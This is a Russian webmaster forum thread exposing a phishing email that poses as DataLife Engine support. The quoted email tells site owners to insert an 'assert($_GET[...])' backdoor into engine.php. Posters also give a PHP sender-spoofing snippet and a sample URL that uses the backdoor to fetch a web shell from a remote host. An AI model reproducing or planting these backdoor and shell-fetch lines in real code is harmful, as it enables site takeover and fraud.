- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Конечно, фейк. Не иначе. Заголовки письма глядите всегда.
$Name = "dle-news.ru"; //от кого
$email = "tech@dle-news.ru"; //какой e-mail adress
$recipient = "mymail@yandex.ru"; //кому
$mail_body = "Не важно какой текст"; //текст
$subject = "Баг в DLE"; //тема
$header = "From: ". $Name . " <" . $email . ">\r\n"; //optional headerfields
ini_set('sendmail_from', $email);
mail($recipient, $subject, $mail_body, $header);
?>
А так даже не поможет просмотр заголовка письма, только проверка информации.
Будут они еще заморачиваться с рассылкой, писали же что вся информация о багах на сайте.
Будут они еще заморачиваться с рассылкой, писали же что вся информация о багах на сайте.
Как celsoft отвечал в личку, что рассылку делают при нахождении критического бага, а там где Администратор лопух, рассылка не выполняется нужно посещать указанный раздел и смотреть в админке скрипта новости подгружаемые при проверке обновления.
Получил письмо :)
Данное письмо вам отправил support@dle-news.ru с сайта http://***.ru/
------------------------------------------------
Текст сообщения
------------------------------------------------
Здравствуйте, уважаемый клиент!
Благодарим Вас за использование на Вашем сайте ***.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: ***.ru/engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_GET[REQUEST]);
С уважением,
Служба поддержки «DataLife Engine»
IP адрес отправителя: 162.244.33.213
------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма
С уважением,
Администрация http://***.ru/
В тред приглашается представитель King-Servers.com
В тред приглашается представитель King-Servers.com
А толку его приглашать? В саппорт абузу накатать на мыло и жить дальше.
Здравствуйте. Спасибо что сообщили. Мы посмотрели, на этом сервере находит впн сервис, по этому проблему решить нельзя.
Если хотите, можем закрыть доступ с серверов к вашим ресурсам. Для этого пишите в абуз департамент king-support.com
И меня сегодня порадовали таким письмом с того же IP 162.244.33.213
И меня сегодня порадовали таким письмом с того же IP 162.244.33.213
Написали же выше: "проблему решить нельзя".
Задача неразрешима.
Тему можно закрывать.
Мне пришло такое письмо на днях, .....*валяццо пацталом* с этого письма))))Тут же и дураку понятно что потом можно сделать чтото вроде
infected_file.php?DATALIFEENGINE=copy("http://host.com/shell.txt","./shell.php");